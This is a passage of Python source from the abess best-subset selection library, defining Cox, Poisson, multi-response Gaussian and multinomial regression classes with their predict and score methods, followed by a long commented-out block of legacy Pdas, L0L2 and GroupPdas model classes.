    >>> model = abessCox(path_type="pgs")
    >>> model.fit(data.x, data.y)
    >>> model.predict(data.x)
    """

    def __init__(self, max_iter=20, exchange_num=5, path_type="seq", is_warm_start=True, support_size=None, alpha=None, s_min=None, s_max=None,
                 ic_type="ebic", ic_coef=1.0, cv=1, is_screening=False, screening_size=None,
                 # NOTE(review): mutable default ([]); only forwarded, never
                 # mutated here, so it is kept for interface compatibility.
                 always_select=[],
                 primary_model_fit_max_iter=10, primary_model_fit_epsilon=1e-8,
                 approximate_Newton=False,
                 thread=1,
                 sparse_matrix=False,
                 splicing_type=0,
                 important_search=128
                 ):
        # Forward everything to bess_base; this subclass fixes the Cox
        # proportional-hazards model and its data type.
        super(abessCox, self).__init__(
            algorithm_type="abess", model_type="Cox", data_type=3, path_type=path_type, max_iter=max_iter, exchange_num=exchange_num,
            is_warm_start=is_warm_start, support_size=support_size, alpha=alpha, s_min=s_min, s_max=s_max,
            ic_type=ic_type, ic_coef=ic_coef, cv=cv, is_screening=is_screening, screening_size=screening_size,
            always_select=always_select,
            primary_model_fit_max_iter=primary_model_fit_max_iter, primary_model_fit_epsilon=primary_model_fit_epsilon,
            approximate_Newton=approximate_Newton,
            thread=thread,
            sparse_matrix=sparse_matrix,
            splicing_type=splicing_type,
            important_search=important_search
        )

    def predict(self, X):
        r"""
        For Cox model,
        the predict function returns the time-independent part of hazard
        function, i.e. :math:`\exp(X\beta)`, on given data.

        Parameters
        ----------
        X : array-like of shape (n_samples, p_features)
            Test data.
        """
        X = self.new_data_check(X)
        # No intercept term in the Cox model: the baseline hazard absorbs it.
        return np.exp(X.dot(self.coef_))

    def score(self, X, y):
        """
        Give new data, and it returns C-index.

        Parameters
        ----------
        X : array-like of shape (n_samples, n_features)
            Test data.
        y : array-like of shape (n_samples, n_features), optional
            Test response.
        """
        X, y = self.new_data_check(X, y)
        risk_score = X.dot(self.coef_)
        y = np.array(y)
        # y is treated as two columns: column 0 the survival time, column 1
        # the event indicator (cast to bool) — presumably matching the
        # layout produced by make_glm_data(family='cox'); confirm.
        result = concordance_index_censored(
            np.array(y[:, 1], np.bool_), y[:, 0], risk_score)
        return result[0]
@ fix_docs
class abessPoisson(bess_base):
    """
    Adaptive Best-Subset Selection(ABESS) algorithm for Poisson regression.

    Parameters
    ----------
    splicing_type: {0, 1}, optional
        The type of splicing in `fit()` (in Algorithm.h).
        "0" for decreasing by half, "1" for decreasing by one.
        Default: splicing_type = 0.
    important_search : int, optional
        The size of inactive set during updating active set when splicing.
        It should be a non-negative integer.
        Default: important_search = 128.

    Examples
    --------
    >>> ### Sparsity known
    >>>
    >>> from abess.linear import abessPoisson
    >>> from abess.datasets import make_glm_data
    >>> import numpy as np
    >>> np.random.seed(12345)
    >>> data = make_glm_data(n = 100, p = 50, k = 10, family = 'poisson')
    >>> model = abessPoisson(support_size = [10])
    >>> model.fit(data.x, data.y)
    >>> model.predict(data.x)
    >>> ### Sparsity unknown
    >>>
    >>> # path_type="seq",
    >>> # Default: support_size = list(range(0, max(min(p, int(n / (np.log(np.log(n)) * np.log(p)))), 1))).
    >>> model = abessPoisson(path_type = "seq")
    >>> model.fit(data.x, data.y)
    >>> model.predict(data.x)
    >>>
    >>> # path_type="pgs",
    >>> # Default: s_min=1, s_max=min(p, int(n / (np.log(np.log(n)) * np.log(p)))), K_max = int(math.log(p, 2/(math.sqrt(5) - 1)))
    >>> model = abessPoisson(path_type="pgs")
    >>> model.fit(data.x, data.y)
    >>> model.predict(data.x)
    """

    def __init__(self, max_iter=20, exchange_num=5, path_type="seq", is_warm_start=True, support_size=None, alpha=None, s_min=None, s_max=None,
                 ic_type="ebic", ic_coef=1.0, cv=1, is_screening=False, screening_size=None,
                 # NOTE(review): mutable default ([]); only forwarded, never
                 # mutated here, so it is kept for interface compatibility.
                 always_select=[],
                 primary_model_fit_max_iter=10, primary_model_fit_epsilon=1e-8,
                 thread=1,
                 sparse_matrix=False,
                 splicing_type=0,
                 important_search=128
                 ):
        # Forward everything to bess_base; this subclass fixes the Poisson
        # model and its data type.
        super(abessPoisson, self).__init__(
            algorithm_type="abess", model_type="Poisson", data_type=2, path_type=path_type, max_iter=max_iter, exchange_num=exchange_num,
            is_warm_start=is_warm_start, support_size=support_size, alpha=alpha, s_min=s_min, s_max=s_max,
            ic_type=ic_type, ic_coef=ic_coef, cv=cv, is_screening=is_screening, screening_size=screening_size,
            always_select=always_select,
            primary_model_fit_max_iter=primary_model_fit_max_iter, primary_model_fit_epsilon=primary_model_fit_epsilon,
            thread=thread,
            sparse_matrix=sparse_matrix,
            splicing_type=splicing_type,
            important_search=important_search
        )

    def predict(self, X):
        """
        For Poisson model,
        the predict function returns a numpy array of the prediction of the mean of response,
        on given data.

        Parameters
        ----------
        X : array-like of shape (n_samples, p_features)
            Test data.
        """
        X = self.new_data_check(X)
        intercept_ = np.ones(X.shape[0]) * self.intercept_
        # Mean of a Poisson response under a log link: exp(X @ beta + b0).
        xbeta_exp = np.exp(X.dot(self.coef_) + intercept_)
        return xbeta_exp

    def score(self, X, y):
        """
        Give new data, and it returns the prediction error.

        Parameters
        ----------
        X : array-like of shape (n_samples, n_features)
            Test data.
        y : array-like of shape (n_samples, n_features), optional
            Test response.
        """
        X, y = self.new_data_check(X, y)
        intercept_ = np.ones(X.shape[0]) * self.intercept_
        eta = X.dot(self.coef_) + intercept_
        exp_eta = np.exp(eta)
        # Poisson log-likelihood up to the additive log(y!) constant.
        return (y * eta - exp_eta).sum()
@ fix_docs
class abessMultigaussian(bess_base):
    """
    Adaptive Best-Subset Selection(ABESS) algorithm for multitasklearning.

    Parameters
    ----------
    splicing_type: {0, 1}, optional
        The type of splicing in `fit()` (in Algorithm.h).
        "0" for decreasing by half, "1" for decreasing by one.
        Default: splicing_type = 0.
    important_search : int, optional
        The size of inactive set during updating active set when splicing.
        It should be a non-negative integer.
        Default: important_search = 128.

    Examples
    --------
    >>> ### Sparsity known
    >>>
    >>> from abess.linear import abessMultigaussian
    >>> from abess.datasets import make_multivariate_glm_data
    >>> import numpy as np
    >>> np.random.seed(12345)
    >>> data = make_multivariate_glm_data(n = 100, p = 50, k = 10, M = 3, family = 'multigaussian')
    >>> model = abessMultigaussian(support_size = [10])
    >>> model.fit(data.x, data.y)
    >>> model.predict(data.x)
    >>> ### Sparsity unknown
    >>>
    >>> # path_type="seq",
    >>> # Default: support_size = list(range(0, max(min(p, int(n / (np.log(np.log(n)) * np.log(p)))), 1))).
    >>> model = abessMultigaussian(path_type = "seq")
    >>> model.fit(data.x, data.y)
    >>> model.predict(data.x)
    >>>
    >>> # path_type="pgs",
    >>> # Default: s_min=1, s_max=min(p, int(n / (np.log(np.log(n)) * np.log(p)))), K_max = int(math.log(p, 2/(math.sqrt(5) - 1)))
    >>> model = abessMultigaussian(path_type="pgs")
    >>> model.fit(data.x, data.y)
    >>> model.predict(data.x)
    """

    def __init__(self, max_iter=20, exchange_num=5, path_type="seq", is_warm_start=True, support_size=None, alpha=None, s_min=None, s_max=None,
                 ic_type="ebic", ic_coef=1.0, cv=1, is_screening=False, screening_size=None,
                 # NOTE(review): mutable default ([]); only forwarded, never
                 # mutated here, so it is kept for interface compatibility.
                 always_select=[],
                 thread=1, covariance_update=False,
                 sparse_matrix=False,
                 splicing_type=0,
                 important_search=128
                 ):
        # Forward everything to bess_base; this subclass fixes the
        # multi-response gaussian model and its data type.
        super(abessMultigaussian, self).__init__(
            algorithm_type="abess", model_type="Multigaussian", data_type=1, path_type=path_type, max_iter=max_iter, exchange_num=exchange_num,
            is_warm_start=is_warm_start, support_size=support_size, alpha=alpha, s_min=s_min, s_max=s_max,
            ic_type=ic_type, ic_coef=ic_coef, cv=cv, is_screening=is_screening, screening_size=screening_size,
            always_select=always_select,
            thread=thread, covariance_update=covariance_update,
            sparse_matrix=sparse_matrix,
            splicing_type=splicing_type,
            important_search=important_search
        )

    def predict(self, X):
        """
        For Multigaussian model,
        the predict function returns a numpy matrix of the prediction of the mean of responses,
        on given data.

        Parameters
        ----------
        X : array-like of shape (n_samples, p_features)
            Test data.
        """
        X = self.new_data_check(X)
        # Broadcast the per-response intercept row across all n samples.
        intercept_ = np.repeat(
            self.intercept_[np.newaxis, ...], X.shape[0], axis=0)
        return X.dot(self.coef_) + intercept_

    def score(self, X, y):
        """
        Give new data, and it returns prediction error.

        Parameters
        ----------
        X : array-like of shape (n_samples, n_features)
            Test data.
        y : array-like of shape (n_samples, n_features), optional
            Test response.
        """
        X, y = self.new_data_check(X, y)
        y_pred = self.predict(X)
        # Negative sum of squared errors over all responses.
        return -((y - y_pred)*(y - y_pred)).sum()
@fix_docs
class abessMultinomial(bess_base):
    """
    Adaptive Best-Subset Selection (ABESS) algorithm for the
    multiclassification problem.

    Parameters
    ----------
    splicing_type: {0, 1}, optional
        The type of splicing in `fit()` (in Algorithm.h).
        "0" for decreasing by half, "1" for decreasing by one.
        Default: splicing_type = 0.
    important_search : int, optional
        The size of inactive set during updating active set when splicing.
        It should be a non-negative integer.
        Default: important_search = 128.

    Examples
    --------
    >>> ### Sparsity known
    >>>
    >>> from abess.linear import abessMultinomial
    >>> from abess.datasets import make_multivariate_glm_data
    >>> import numpy as np
    >>> np.random.seed(12345)
    >>> data = make_multivariate_glm_data(n = 100, p = 50, k = 10, M = 3, family = 'multinomial')
    >>> model = abessMultinomial(support_size = [10])
    >>> model.fit(data.x, data.y)
    >>> model.predict(data.x)
    >>> ### Sparsity unknown
    >>>
    >>> # path_type="seq",
    >>> # Default: support_size = list(range(0, max(min(p, int(n / (np.log(np.log(n)) * np.log(p)))), 1))).
    >>> model = abessMultinomial(path_type = "seq")
    >>> model.fit(data.x, data.y)
    >>> model.predict(data.x)
    >>>
    >>> # path_type="pgs",
    >>> # Default: s_min=1, s_max=min(p, int(n / (np.log(np.log(n)) * np.log(p)))), K_max = int(math.log(p, 2/(math.sqrt(5) - 1)))
    >>> model = abessMultinomial(path_type="pgs")
    >>> model.fit(data.x, data.y)
    >>> model.predict(data.x)
    """

    def __init__(self, max_iter=20, exchange_num=5, path_type="seq",
                 is_warm_start=True, support_size=None, alpha=None,
                 s_min=None, s_max=None,
                 ic_type="ebic", ic_coef=1.0, cv=1, is_screening=False,
                 screening_size=None,
                 # NOTE(review): mutable default kept for interface
                 # compatibility; it is only forwarded, never mutated here.
                 always_select=[],
                 primary_model_fit_max_iter=10, primary_model_fit_epsilon=1e-8,
                 approximate_Newton=False,
                 thread=1,
                 sparse_matrix=False,
                 splicing_type=0,
                 important_search=128
                 ):
        # All configuration is forwarded to bess_base; this class only fixes
        # the multinomial model and its data type.
        super(abessMultinomial, self).__init__(
            algorithm_type="abess", model_type="Multinomial", data_type=2,
            path_type=path_type, max_iter=max_iter, exchange_num=exchange_num,
            is_warm_start=is_warm_start, support_size=support_size,
            alpha=alpha, s_min=s_min, s_max=s_max,
            ic_type=ic_type, ic_coef=ic_coef, cv=cv,
            is_screening=is_screening, screening_size=screening_size,
            always_select=always_select,
            primary_model_fit_max_iter=primary_model_fit_max_iter,
            primary_model_fit_epsilon=primary_model_fit_epsilon,
            approximate_Newton=approximate_Newton,
            thread=thread,
            sparse_matrix=sparse_matrix,
            splicing_type=splicing_type,
            important_search=important_search
        )

    def predict_proba(self, X):
        """
        Give the probabilities of each new sample being assigned to the
        different classes, as an (n_samples, n_classes) matrix whose rows
        sum to 1.

        Parameters
        ----------
        X : array-like of shape (n_samples, p_features)
            Test data.
        """
        X = self.new_data_check(X)
        intercept_ = np.repeat(
            self.intercept_[np.newaxis, ...], X.shape[0], axis=0)
        xbeta = X.dot(self.coef_) + intercept_
        # Bug fix: the original loop overwrote `pr` on every iteration and
        # returned only the LAST sample's probabilities. Normalize every row
        # at once instead. Subtracting the per-row max before exponentiating
        # is the standard softmax stability trick and does not change the
        # result.
        xbeta = xbeta - xbeta.max(axis=1, keepdims=True)
        eta = np.exp(xbeta)
        return eta / eta.sum(axis=1, keepdims=True)

    def predict(self, X):
        """
        For the multinomial model, return the most probable class for each
        given sample, as an array of class indices of length n_samples.

        Parameters
        ----------
        X : array-like of shape (n_samples, p_features)
            Test data.
        """
        X = self.new_data_check(X)
        intercept_ = np.repeat(
            self.intercept_[np.newaxis, ...], X.shape[0], axis=0)
        xbeta = X.dot(self.coef_) + intercept_
        # Bug fix: np.argmax without axis= flattens the matrix and returns a
        # single scalar index; per-sample classes require axis=1.
        return np.argmax(xbeta, axis=1)

    def score(self, X, y):
        """
        Give new data, and it returns the entropy function (multinomial
        log-likelihood of the predicted probabilities).

        Parameters
        ----------
        X : array-like of shape (n_samples, n_features)
            Test data.
        y : array-like of shape (n_samples, n_features), optional
            Test response (dummy variables of real class).
        """
        X, y = self.new_data_check(X, y)
        pr = self.predict_proba(X)
        return np.sum(y * np.log(pr))
# @fix_docs
# class PdasLm(bess_base):
# '''
# PdasLm
# The PDAS solution to the best subset selection for linear regression.
# Examples
# --------
# ### Sparsity known
# >>> from bess.linear import *
# >>> import numpy as np
# >>> np.random.seed(12345) # fix seed to get the same result
# >>> x = np.random.normal(0, 1, 100 * 150).reshape((100, 150))
# >>> beta = np.hstack((np.array([1, 1, -1, -1, -1]), np.zeros(145)))
# >>> noise = np.random.normal(0, 1, 100)
# >>> y = np.matmul(x, beta) + noise
# >>> model = PdasLm(path_type="seq", support_size=[5])
# >>> model.fit(X=x, y=y)
# >>> model.predict(x)
# ### Sparsity unknown
# >>> # path_type="seq", Default:support_size=[1,2,...,min(x.shape[0], x.shape[1])]
# >>> model = PdasLm(path_type="seq")
# >>> model.fit(X=x, y=y)
# >>> model.predict(x)
# >>> # path_type="pgs", Default:s_min=1, s_max=X.shape[1], K_max = int(math.log(p, 2/(math.sqrt(5) - 1)))
# >>> model = PdasLm(path_type="pgs")
# >>> model.fit(X=x, y=y)
# >>> model.predict(x)
# '''
# def __init__(self, max_iter=20, exchange_num=5, path_type="seq", is_warm_start=True, support_size=None, alpha=None, s_min=None, s_max=None,
# K_max=1, epsilon=0.0001, lambda_min=None, lambda_max=None, ic_type="ebic", cv=1, is_screening=False, screening_size=None, powell_path=1,
# always_select=[], tau=0.):
# super(PdasLm, self).__init__(
# algorithm_type="Pdas", model_type="Lm", path_type=path_type, max_iter=max_iter, exchange_num=exchange_num,
# is_warm_start=is_warm_start, support_size=support_size, alpha=alpha, s_min=s_min, s_max=s_max, K_max=K_max,
# epsilon=epsilon, lambda_min=lambda_min, lambda_max=lambda_max, ic_type=ic_type, cv=cv, is_screening=is_screening, screening_size=screening_size, powell_path=powell_path,
# always_select=always_select, tau=tau)
# self.data_type = 1
# @fix_docs
# class PdasLogistic(bess_base):
# """
# Examples
# --------
# ### Sparsity known
# >>> from bess.linear import *
# >>> import numpy as np
# >>> np.random.seed(12345)
# >>> x = np.random.normal(0, 1, 100 * 150).reshape((100, 150))
# >>> beta = np.hstack((np.array([1, 1, -1, -1, -1]), np.zeros(145)))
# >>> xbeta = np.matmul(x, beta)
# >>> p = np.exp(xbeta)/(1+np.exp(xbeta))
# >>> y = np.random.binomial(1, p)
# >>> model = PdasLogistic(path_type="seq", support_size=[5])
# >>> model.fit(X=x, y=y)
# >>> model.predict(x)
# ### Sparsity unknown
# >>> # path_type="seq", Default:support_size=[1,2,...,min(x.shape[0], x.shape[1])]
# >>> model = PdasLogistic(path_type="seq")
# >>> model.fit(X=x, y=y)
# >>> model.predict(x)
# >>> # path_type="pgs", Default:s_min=1, s_max=X.shape[1], K_max = int(math.log(p, 2/(math.sqrt(5) - 1)))
# >>> model = PdasLogistic(path_type="pgs")
# >>> model.fit(X=x, y=y)
# >>> model.predict(x)
# """
# def __init__(self, max_iter=20, exchange_num=5, path_type="seq", is_warm_start=True, support_size=None, alpha=None, s_min=None, s_max=None,
# K_max=1, epsilon=0.0001, lambda_min=None, lambda_max=None, ic_type="ebic", cv=1, is_screening=False, screening_size=None, powell_path=1,
# always_select=[], tau=0.
# ):
# super(PdasLogistic, self).__init__(
# algorithm_type="Pdas", model_type="Logistic", path_type=path_type, max_iter=max_iter, exchange_num=exchange_num,
# is_warm_start=is_warm_start, support_size=support_size, alpha=alpha, s_min=s_min, s_max=s_max, K_max=K_max,
# epsilon=epsilon, lambda_min=lambda_min, lambda_max=lambda_max, ic_type=ic_type, cv=cv, is_screening=is_screening, screening_size=screening_size, powell_path=powell_path,
# always_select=always_select, tau=tau)
# self.data_type = 2
# @fix_docs
# class PdasPoisson(bess_base):
# """
# Examples
# --------
# ### Sparsity known
# >>> from bess.linear import *
# >>> import numpy as np
# >>> np.random.seed(12345)
# >>> x = np.random.normal(0, 1, 100 * 150).reshape((100, 150))
# >>> beta = np.hstack((np.array([1, 1, -1, -1, -1]), np.zeros(145)))
# >>> lam = np.exp(np.matmul(x, beta))
# >>> y = np.random.poisson(lam=lam)
# >>> model = PdasPoisson(path_type="seq", support_size=[5])
# >>> model.fit(X=x, y=y)
# >>> model.predict(x)
# ### Sparsity unknown
# >>> # path_type="seq", Default:support_size=[1,2,...,min(x.shape[0], x.shape[1])]
# >>> model = PdasPoisson(path_type="seq")
# >>> model.fit(X=x, y=y)
# >>> model.predict(x)
# >>> # path_type="pgs", Default:s_min=1, s_max=X.shape[1], K_max = int(math.log(p, 2/(math.sqrt(5) - 1)))
# >>> model = PdasPoisson(path_type="pgs")
# >>> model.fit(X=x, y=y)
# >>> model.predict(x)
# """
# def __init__(self, max_iter=20, exchange_num=5, path_type="seq", is_warm_start=True, support_size=None, alpha=None, s_min=None, s_max=None,
# K_max=1, epsilon=0.0001, lambda_min=None, lambda_max=None, ic_type="ebic", cv=1, is_screening=False, screening_size=None, powell_path=1,
# always_select=[], tau=0.
# ):
# super(PdasPoisson, self).__init__(
# algorithm_type="Pdas", model_type="Poisson", path_type=path_type, max_iter=max_iter, exchange_num=exchange_num,
# is_warm_start=is_warm_start, support_size=support_size, alpha=alpha, s_min=s_min, s_max=s_max, K_max=K_max,
# epsilon=epsilon, lambda_min=lambda_min, lambda_max=lambda_max, ic_type=ic_type, cv=cv, is_screening=is_screening, screening_size=screening_size, powell_path=powell_path,
# always_select=always_select, tau=tau
# )
# self.data_type = 2
# @fix_docs
# class PdasCox(bess_base):
# """
# Examples
# --------
# ### Sparsity known
# >>> from bess.linear import *
# >>> import numpy as np
# >>> np.random.seed(12345)
# >>> data = make_glm_data(100, 200, family="cox", cv=1, rho=0, sigma=1, c=10)
# >>> model = PdasCox(path_type="seq", support_size=[5])
# >>> model.fit(data.x, data.y, is_normal=True)
# >>> model.predict(data.x)
# ### Sparsity unknown
# >>> # path_type="seq", Default:support_size=[1,2,...,min(x.shape[0], x.shape[1])]
# >>> model = PdasCox(path_type="seq")
# >>> model.fit(data.x, data.y, is_normal=True)
# >>> model.predict(data.x)
# >>> # path_type="pgs", Default:s_min=1, s_max=X.shape[1], K_max = int(math.log(p, 2/(math.sqrt(5) - 1)))
# >>> model = PdasCox(path_type="pgs")
# >>> model.fit(X=x, y=y)
# >>> model.predict(x)
# """
# def __init__(self, max_iter=20, exchange_num=5, path_type="seq", is_warm_start=True, support_size=None, alpha=None, s_min=None, s_max=None,
# K_max=1, epsilon=0.0001, lambda_min=None, lambda_max=None, ic_type="ebic", cv=1, is_screening=False, screening_size=None, powell_path=1,
# always_select=[], tau=0.
# ):
# super(PdasCox, self).__init__(
# algorithm_type="Pdas", model_type="Cox", path_type=path_type, max_iter=max_iter, exchange_num=exchange_num,
# is_warm_start=is_warm_start, support_size=support_size, alpha=alpha, s_min=s_min, s_max=s_max, K_max=K_max,
# epsilon=epsilon, lambda_min=lambda_min, lambda_max=lambda_max, ic_type=ic_type, cv=cv, is_screening=is_screening, screening_size=screening_size, powell_path=powell_path,
# always_select=always_select, tau=tau)
# self.data_type = 3
# @fix_docs
# class L0L2Lm(bess_base):
# """
# Examples
# --------
# ### Sparsity known
# >>> from bess.linear import *
# >>> import numpy as np
# >>> np.random.seed(12345) # fix seed to get the same result
# >>> x = np.random.normal(0, 1, 100 * 150).reshape((100, 150))
# >>> beta = np.hstack((np.array([1, 1, -1, -1, -1]), np.zeros(145)))
# >>> noise = np.random.normal(0, 1, 100)
# >>> y = np.matmul(x, beta) + noise
# >>> model = PdasLm(path_type="seq", support_size=[5])
# >>> model.fit(X=x, y=y)
# >>> model.predict(x)
# ### Sparsity unknown
# >>> # path_type="seq", Default:support_size=[1,2,...,min(x.shape[0], x.shape[1])]
# >>> model = PdasLm(path_type="seq")
# >>> model.fit(X=x, y=y)
# >>> model.predict(x)
# >>> # path_type="pgs", Default:s_min=1, s_max=X.shape[1], K_max = int(math.log(p, 2/(math.sqrt(5) - 1)))
# >>> model = PdasLm(path_type="pgs")
# >>> model.fit(X=x, y=y)
# >>> model.predict(x)
# """
# def __init__(self, max_iter=20, exchange_num=5, path_type="seq", is_warm_start=True, support_size=None, alpha=None, s_min=None, s_max=None,
# K_max=1, epsilon=0.0001, lambda_min=None, lambda_max=None, ic_type="ebic", cv=1, is_screening=False, screening_size=None, powell_path=1,
# always_select=[], tau=0.
# ):
# super(L0L2Lm, self).__init__(
# algorithm_type="L0L2", model_type="Lm", path_type=path_type, max_iter=max_iter, exchange_num=exchange_num,
# is_warm_start=is_warm_start, support_size=support_size, alpha=alpha, s_min=s_min, s_max=s_max, K_max=K_max,
# epsilon=epsilon, lambda_min=lambda_min, lambda_max=lambda_max, ic_type=ic_type, cv=cv, is_screening=is_screening, screening_size=screening_size, powell_path=powell_path,
# always_select=always_select, tau=tau
# )
# self.data_type = 1
# @fix_docs
# class L0L2Logistic(bess_base):
# """
# Examples
# --------
# ### Sparsity known
# >>> from bess.linear import *
# >>> import numpy as np
# >>> np.random.seed(12345) # fix seed to get the same result
# >>> x = np.random.normal(0, 1, 100 * 150).reshape((100, 150))
# >>> beta = np.hstack((np.array([1, 1, -1, -1, -1]), np.zeros(145)))
# >>> noise = np.random.normal(0, 1, 100)
# >>> y = np.matmul(x, beta) + noise
# >>> model = PdasLm(path_type="seq", support_size=[5])
# >>> model.fit(X=x, y=y)
# >>> model.predict(x)
# ### Sparsity unknown
# >>> # path_type="seq", Default:support_size=[1,2,...,min(x.shape[0], x.shape[1])]
# >>> model = PdasLm(path_type="seq")
# >>> model.fit(X=x, y=y)
# >>> model.predict(x)
# >>> # path_type="pgs", Default:s_min=1, s_max=X.shape[1], K_max = int(math.log(p, 2/(math.sqrt(5) - 1)))
# >>> model = PdasLm(path_type="pgs")
# >>> model.fit(X=x, y=y)
# >>> model.predict(x)
# """
# def __init__(self, max_iter=20, exchange_num=5, path_type="seq", is_warm_start=True, support_size=None, alpha=None, s_min=None, s_max=None,
# K_max=1, epsilon=0.0001, lambda_min=None, lambda_max=None, ic_type="ebic", cv=1, is_screening=False, screening_size=None, powell_path=1,
# always_select=[], tau=0.
# ):
# super(L0L2Logistic, self).__init__(
# algorithm_type="L0L2", model_type="Logistic", path_type=path_type, max_iter=max_iter, exchange_num=exchange_num,
# is_warm_start=is_warm_start, support_size=support_size, alpha=alpha, s_min=s_min, s_max=s_max, K_max=K_max,
# epsilon=epsilon, lambda_min=lambda_min, lambda_max=lambda_max, ic_type=ic_type, cv=cv, is_screening=is_screening, screening_size=screening_size, powell_path=powell_path,
# always_select=always_select, tau=tau)
# self.data_type = 2
# @fix_docs
# class L0L2Poisson(bess_base):
# """
# Examples
# --------
# ### Sparsity known
# >>> from bess.linear import *
# >>> import numpy as np
# >>> np.random.seed(12345)
# >>> x = np.random.normal(0, 1, 100 * 150).reshape((100, 150))
# >>> beta = np.hstack((np.array([1, 1, -1, -1, -1]), np.zeros(145)))
# >>> lam = np.exp(np.matmul(x, beta))
# >>> y = np.random.poisson(lam=lam)
# >>> model = PdasPoisson(path_type="seq", support_size=[5])
# >>> model.fit(X=x, y=y)
# >>> model.predict(x)
# ### Sparsity unknown
# >>> # path_type="seq", Default:support_size=[1,2,...,min(x.shape[0], x.shape[1])]
# >>> model = PdasPoisson(path_type="seq")
# >>> model.fit(X=x, y=y)
# >>> model.predict(x)
# >>> # path_type="pgs", Default:s_min=1, s_max=X.shape[1], K_max = int(math.log(p, 2/(math.sqrt(5) - 1)))
# >>> model = PdasPoisson(path_type="pgs")
# >>> model.fit(X=x, y=y)
# >>> model.predict(x)
# """
# def __init__(self, max_iter=20, exchange_num=5, path_type="seq", is_warm_start=True, support_size=None, alpha=None, s_min=None, s_max=None,
# K_max=1, epsilon=0.0001, lambda_min=None, lambda_max=None, ic_type="ebic", cv=1, is_screening=False, screening_size=None, powell_path=1,
# always_select=[], tau=0.
# ):
# super(L0L2Poisson, self).__init__(
# algorithm_type="L0L2", model_type="Poisson", path_type=path_type, max_iter=max_iter, exchange_num=exchange_num,
# is_warm_start=is_warm_start, support_size=support_size, alpha=alpha, s_min=s_min, s_max=s_max, K_max=K_max,
# epsilon=epsilon, lambda_min=lambda_min, lambda_max=lambda_max, ic_type=ic_type, cv=cv, is_screening=is_screening, screening_size=screening_size, powell_path=powell_path,
# always_select=always_select, tau=tau
# )
# self.data_type = 2
# @fix_docs
# class L0L2Cox(bess_base):
# """
# Examples
# --------
# ### Sparsity known
# >>> from bess.linear import *
# >>> import numpy as np
# >>> np.random.seed(12345)
# >>> data = make_glm_data(100, 200, family="cox", cv=1, rho=0, sigma=1, c=10)
# >>> model = PdasCox(path_type="seq", support_size=[5])
# >>> model.fit(data.x, data.y, is_normal=True)
# >>> model.predict(data.x)
# ### Sparsity unknown
# >>> # path_type="seq", Default:support_size=[1,2,...,min(x.shape[0], x.shape[1])]
# >>> model = PdasCox(path_type="seq")
# >>> model.fit(data.x, data.y, is_normal=True)
# >>> model.predict(data.x)
# >>> # path_type="pgs", Default:s_min=1, s_max=X.shape[1], K_max = int(math.log(p, 2/(math.sqrt(5) - 1)))
# >>> model = PdasCox(path_type="pgs")
# >>> model.fit(X=x, y=y)
# >>> model.predict(x)
# """
# def __init__(self, max_iter=20, exchange_num=5, path_type="seq", is_warm_start=True, support_size=None, alpha=None, s_min=None, s_max=None,
# K_max=1, epsilon=0.0001, lambda_min=None, lambda_max=None, ic_type="ebic", cv=1, is_screening=False, screening_size=None, powell_path=1,
# always_select=[], tau=0.
# ):
# super(L0L2Cox, self).__init__(
# algorithm_type="L0L2", model_type="Cox", path_type=path_type, max_iter=max_iter, exchange_num=exchange_num,
# is_warm_start=is_warm_start, support_size=support_size, alpha=alpha, s_min=s_min, s_max=s_max, K_max=K_max,
# epsilon=epsilon, lambda_min=lambda_min, lambda_max=lambda_max, ic_type=ic_type, cv=cv, is_screening=is_screening, screening_size=screening_size, powell_path=powell_path,
# always_select=always_select, tau=tau)
# self.data_type = 3
# @fix_docs
# class GroupPdasLm(bess_base):
# """
# Examples
# --------
# ### Sparsity known
# >>> from bess.linear import *
# >>> import numpy as np
# >>> np.random.seed(12345) # fix seed to get the same result
# >>> x = np.random.normal(0, 1, 100 * 150).reshape((100, 150))
# >>> beta = np.hstack((np.array([1, 1, -1, -1, -1]), np.zeros(145)))
# >>> noise = np.random.normal(0, 1, 100)
# >>> y = np.matmul(x, beta) + noise
# >>> model = GroupPdasLm(path_type="seq", support_size=[5])
# >>> model.fit(X=x, y=y)
# >>> model.predict(x)
# ### Sparsity unknown
# >>> # path_type="seq", Default:support_size=[1,2,...,min(x.shape[0], x.shape[1])]
# >>> model = GroupPdasLm(path_type="seq")
# >>> model.fit(X=x, y=y)
# >>> model.predict(x)
# >>> # path_type="pgs", Default:s_min=1, s_max=X.shape[1], K_max = int(math.log(p, 2/(math.sqrt(5) - 1)))
# >>> model = GroupPdasLm(path_type="pgs")
# >>> model.fit(X=x, y=y)
# >>> model.predict(x)
# """
# def __init__(self, max_iter=20, exchange_num=5, path_type="seq", is_warm_start=True, support_size=None, alpha=None, s_min=None, s_max=None,
# K_max=1, epsilon=0.0001, lambda_min=None, lambda_max=None, ic_type="ebic", cv=1, is_screening=False, screening_size=None, powell_path=1,
# always_select=[], tau=0.
# ):
# super(GroupPdasLm, self).__init__(
# algorithm_type="GroupPdas", model_type="Lm", path_type=path_type, max_iter=max_iter, exchange_num=exchange_num,
# is_warm_start=is_warm_start, support_size=support_size, alpha=alpha, s_min=s_min, s_max=s_max, K_max=K_max,
# epsilon=epsilon, lambda_min=lambda_min, lambda_max=lambda_max, ic_type=ic_type, cv=cv, is_screening=is_screening, screening_size=screening_size, powell_path=powell_path,
# always_select=always_select, tau=tau)
# self.data_type = 1
# @fix_docs
# class GroupPdasLogistic(bess_base):
# """
# Examples
# --------
# ### Sparsity known
# >>> from bess.linear import *
# >>> import numpy as np
# >>> np.random.seed(12345)
# >>> x = np.random.normal(0, 1, 100 * 150).reshape((100, 150))
# >>> beta = np.hstack((np.array([1, 1, -1, -1, -1]), np.zeros(145)))
# >>> xbeta = np.matmul(x, beta)
# >>> p = np.exp(xbeta)/(1+np.exp(xbeta))
# >>> y = np.random.binomial(1, p)
# >>> model = GroupPdasLogistic(path_type="seq", support_size=[5])
# >>> model.fit(X=x, y=y)
# >>> model.predict(x)
# ### Sparsity unknown
# >>> # path_type="seq", Default:support_size=[1,2,...,min(x.shape[0], x.shape[1])]
# >>> model = GroupPdasLogistic(path_type="seq")
# >>> model.fit(X=x, y=y)
# >>> model.predict(x)
# >>> # path_type="pgs", Default:s_min=1, s_max=X.shape[1], K_max = int(math.log(p, 2/(math.sqrt(5) - 1)))
# >>> model = GroupPdasLogistic(path_type="pgs")
# >>> model.fit(X=x, y=y)
# >>> model.predict(x)
# """
# def __init__(self, max_iter=20, exchange_num=5, path_type="seq", is_warm_start=True, support_size=None, alpha=None, s_min=None, s_max=None,
# K_max=1, epsilon=0.0001, lambda_min=None, lambda_max=None, ic_type="ebic", cv=1, is_screening=False, screening_size=None, powell_path=1,
# always_select=[], tau=0.
# ):
